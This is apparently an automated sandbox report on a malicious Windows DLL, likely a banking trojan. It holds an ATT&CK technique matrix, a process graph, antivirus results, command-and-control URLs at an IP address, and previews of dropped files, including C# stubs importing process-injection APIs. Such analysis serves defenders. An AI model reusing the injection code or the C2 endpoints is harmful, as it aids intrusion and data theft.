                      Source: Yara matchFile source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation
                      Path Interception812
                      Process Injection
                      1
                      Obfuscated Files or Information
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts2
                      Native API
                      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      File Deletion
                      LSASS Memory1
                      Account Discovery
                      Remote Desktop Protocol1
                      Email Collection
                      Exfiltration Over Bluetooth2
                      Encrypted Channel
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter
                      Logon Script (Windows)Logon Script (Windows)1
                      Masquerading
                      Security Account Manager1
                      File and Directory Discovery
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
                      Virtualization/Sandbox Evasion
                      NTDS25
                      System Information Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script812
                      Process Injection
                      LSA Secrets1
                      Query Registry
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Rundll32
                      Cached Domain Credentials11
                      Security Software Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync31
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                      Process Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery
                      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery
                      Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery
                      Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 620333 Sample: tIJVb0BvkI.dll Startdate: 04/05/2022 Architecture: WINDOWS Score: 100 58 Snort IDS alert for network traffic 2->58 60 Found malware configuration 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 2 other signatures 2->64 11 loaddll32.exe 1 2->11         started        13 mshta.exe 19 2->13         started        process3 process4 15 cmd.exe 1 11->15         started        17 powershell.exe 33 13->17         started        process5 19 rundll32.exe 1 6 15->19         started        23 csc.exe 3 17->23         started        26 csc.exe 3 17->26         started        28 conhost.exe 17->28         started        dnsIp6 54 185.189.151.28, 49758, 80 AS-SOFTPLUSCH Switzerland 19->54 66 System process connects to network (likely due to code injection or exploit) 19->66 68 Writes to foreign memory regions 19->68 70 Modifies the context of a thread in another process (thread injection) 19->70 72 2 other signatures 19->72 30 control.exe 1 19->30         started        50 C:\Users\user\AppData\Local\...\2tb3qiq3.dll, PE32 23->50 dropped 33 cvtres.exe 1 23->33         started        52 C:\Users\user\AppData\Local\...\5xaibb03.dll, PE32 26->52 dropped 35 cvtres.exe 1 26->35         started        file7 signatures8 process9 signatures10 82 Changes memory attributes in foreign processes to executable or writable 30->82 84 Injects code into the Windows Explorer (explorer.exe) 30->84 86 Writes to foreign memory regions 30->86 88 4 other signatures 30->88 37 explorer.exe 2 30->37 injected process11 signatures12 74 Self deletion via cmd delete 37->74 76 Disables SPDY (HTTP compression, likely to perform web injects) 37->76 40 cmd.exe 1 37->40         started        43 RuntimeBroker.exe 37->43 injected process13 signatures14 78 Uses ping.exe to sleep 40->78 80 Uses ping.exe to check the status of other devices and networks 40->80 45 PING.EXE 1 40->45         started        48 conhost.exe 40->48         started        process15 dnsIp16 56 192.168.2.1 unknown unknown 45->56

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      tIJVb0BvkI.dll48%ReversingLabsWin32.Trojan.Jaik
                      tIJVb0BvkI.dll100%Joe Sandbox ML
                      No Antivirus matches
                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.1060000.0.unpack100%AviraHEUR/AGEN.1245293Download File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://185.189.151.28/0%VirustotalBrowse
                      http://185.189.151.28/0%Avira URL Cloudsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/A_2Fp0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLE0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://185.189.151.28/ws0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQ0%Avira URL Cloudsafe
                      http://crl.microsof0%URL Reputationsafe
                      http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umz0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlktrue
                      • Avira URL Cloud: safe
                      unknown
                      http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlktrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.189.151.28/rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://185.189.151.28/drew/A_2Fprundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLErundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517515689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642709206.0000000000AEC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://185.189.151.28/wsrundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQrundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.microsofpowershell.exe, 0000000A.00000003.604947338.00000227AB271000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzrundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      185.189.151.28
                      unknownSwitzerland
                      51395AS-SOFTPLUSCHtrue
                      IP
                      192.168.2.1
                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:620333
                      Start date and time: 04/05/202216:26:192022-05-04 16:26:19 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:tIJVb0BvkI.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:24
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@24/15@0/2
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 85.8% (good quality ratio 82.2%)
                      • Quality average: 82.1%
                      • Quality standard deviation: 27%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 58
                      • Number of non-executed functions: 20
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32
                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 13.107.42.16
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6756 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      TimeTypeDescription
                      16:28:24API Interceptor15x Sleep call for process: powershell.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      185.189.151.28qOfIxt1fnQ.dllGet hashmaliciousBrowse
                        2oCOO5LbPu.dllGet hashmaliciousBrowse
                          rXN8OIpbzz.dllGet hashmaliciousBrowse
                            GlJdt15gDI.dllGet hashmaliciousBrowse
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              AS-SOFTPLUSCHqOfIxt1fnQ.dllGet hashmaliciousBrowse
                              • 185.189.151.28
                              2oCOO5LbPu.dllGet hashmaliciousBrowse
                              • 185.189.151.28
                              rXN8OIpbzz.dllGet hashmaliciousBrowse
                              • 185.189.151.28
                              GlJdt15gDI.dllGet hashmaliciousBrowse
                              • 185.189.151.28
                              o52M6ZqBFpGet hashmaliciousBrowse
                              • 176.10.116.173
                              com.abbondioendrizzi.tools.supercleaner-9-apkplz.net.apkGet hashmaliciousBrowse
                              • 176.10.119.156
                              com.pagnotto28.sellsourcecode.supercleaner-9-apkplz.net.apkGet hashmaliciousBrowse
                              • 176.10.119.156
                              com.pagnotto28.sellsourcecode.alpha-6-apkplz.net.apkGet hashmaliciousBrowse
                              • 176.10.119.156
                              URGENT REQUEST FOR QUOTE_____Pdf.exeGet hashmaliciousBrowse
                              • 91.192.100.6
                              Powerful Cleaner Antivirus_v1.9.apkGet hashmaliciousBrowse
                              • 176.10.119.156
                              K74MviOR7dGet hashmaliciousBrowse
                              • 185.189.149.113
                              xIOggpNWfl.exeGet hashmaliciousBrowse
                              • 176.10.107.180
                              2X3f1ykTmM.exeGet hashmaliciousBrowse
                              • 176.10.99.208
                              lwRhzjuYIg.exeGet hashmaliciousBrowse
                              • 176.10.99.203
                              d03hwI54V0.exeGet hashmaliciousBrowse
                              • 176.10.104.240
                              tbsvrGet hashmaliciousBrowse
                              • 176.10.107.180
                              1p1EpP7mrs.exeGet hashmaliciousBrowse
                              • 185.189.151.142
                              yxvnSxhHKvGet hashmaliciousBrowse
                              • 91.201.59.197
                              xTvIsmAee2.exeGet hashmaliciousBrowse
                              • 176.10.119.29
                              b6pQZxxOuM.exeGet hashmaliciousBrowse
                              • 176.10.119.29
                              No context
                              No context
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11606
                              Entropy (8bit):4.883977562702998
                              Encrypted:false
                              SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
                              MD5:243581397F734487BD471C04FB57EA44
                              SHA1:38CB3BAC7CDC67CB3B246B32117C2C6188243E77
                              SHA-256:7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
                              SHA-512:1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
                              Malicious:false
                              Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text
                              Category:dropped
                              Size (bytes):403
                              Entropy (8bit):5.058106976759534
                              Encrypted:false
                              SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                              MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                              SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                              SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                              SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                              Malicious:false
                              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                              Category:dropped
                              Size (bytes):371
                              Entropy (8bit):5.243693039966474
                              Encrypted:false
                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fqjzxs7+AEszI923fqe:p37Lvkmb6KzWWZE2r
                              MD5:2ED921F1330955F6AFDBB78FA7EAF8F4
                              SHA1:DB24B6EE559C4B25D8F92DD574D95BA7354D9E3D
                              SHA-256:2049BE5CF51E976F56978650CDF497A93641D8DC063B73D195CAF84D280AF0A1
                              SHA-512:34AC6D80B7658F3787B740881DB9CC46724FC2586F8ED2B076E68C59F827C1C96C0E8BC0E0BF7CEE0CDB7C29815BF42F32FCBAC3CD395839E6B70EEE230F42B1
                              Malicious:false
                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.0.cs"
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):3584
                              Entropy (8bit):2.6162239107618914
                              Encrypted:false
                              SSDEEP:24:etGS/8OmU0t3lm85xWAseO4zkQ64pfUPtkZfqmPVUWI+ycuZhNyoakST9PNnq:6dXQ3r5xNOnQfUuJqmd31ulna3rq
                              MD5:89A7D7E72EE4D68C3E0A507D7151F2CE
                              SHA1:89E10E370DE870B07976D508379CA908642B2D98
                              SHA-256:4A403CD94F5DFDDF2C7813781CC570EB1D59EE10DD89774CC30B6AF3BA694B81
                              SHA-512:CAAB903ABFEB4B382EA85182B4820A82A1A6D70C5A1D1F697BFD31487290354F08005E7DBEF03C3FABBF9757D261EE6235F490E05824BADFCF04B45A47344A14
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.sb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):868
                              Entropy (8bit):5.339579234164359
                              Encrypted:false
                              SSDEEP:12:xKIR37Lvkmb6KzWWZE2qKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KznE2qKaM5DqBVKVrdFAMBJTH
                              MD5:7A6F4E96A8D3B3A4C8AF231DDFFDE508
                              SHA1:7EAE899EE47B06783142610DF27ACDEB0F686EC3
                              SHA-256:00DF50BF3A6286D2D1FC5FA1951B22E04370B59802960AFC5BA77EBF21A6647C
                              SHA-512:E75F43E8905AA37E43BDD7D976BB7A84CE521097FA58FEB2CF77436A3688C77F98B3AC12A5D7244DECCE53849D7CD1F25B53E899748E83B00A0DCBECAB3FD014
                              Malicious:false
                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):652
                              Entropy (8bit):3.109354189483703
                              Encrypted:false
                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryZWoak7YnqqqW9PN5Dlq5J:+RI+ycuZhNyoakST9PNnqX
                              MD5:D66AF6FAC9C9D4F1F78AE3A5DC5349E5
                              SHA1:121B0B2A4DC1FC76073D0B9E738768EFF1FD34C9
                              SHA-256:89C80B6EA10BBDEC2FDF0A878C09D3261BD42E09764A38D7F155B4E89894A06C
                              SHA-512:E63B88E36F531BDCDBAE8816D7ED486CD6F6D6F9E307EE228599A213E022423900AC82CB4FAEAB3E30CB0BCBC077C3C9CFADD53FEF5C7D7CEF60E09011DAE54D
                              Malicious:false
                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.t.b.3.q.i.q.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...2.t.b.3.q.i.q.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text
                              Category:dropped
                              Size (bytes):392
                              Entropy (8bit):4.988829579018284
                              Encrypted:false
                              SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                              MD5:80545CB568082AB66554E902D9291782
                              SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                              SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                              SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                              Malicious:false
                              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                              Category:dropped
                              Size (bytes):371
                              Entropy (8bit):5.229282846983885
                              Encrypted:false
                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fp+zxs7+AEszI923fR:p37Lvkmb6KzsWZE2J
                              MD5:8790EA5EBD20665A121C0467D12D0F98
                              SHA1:560171D6E50CA52CB0F3179EE861D66954DFEE36
                              SHA-256:82375D2231FDCA453FFBF57DE02F36378A4A1154A7B935AAC10D766F88CF0E40
                              SHA-512:9A9EFBDC23DAF0910E5775EB4FE052B6CCA5439A4D5BF667151FCD0E055DE8F178233F7D1E209059352F00B1897FE448C9526631472401D581FBFC84AAE7C759
                              Malicious:false
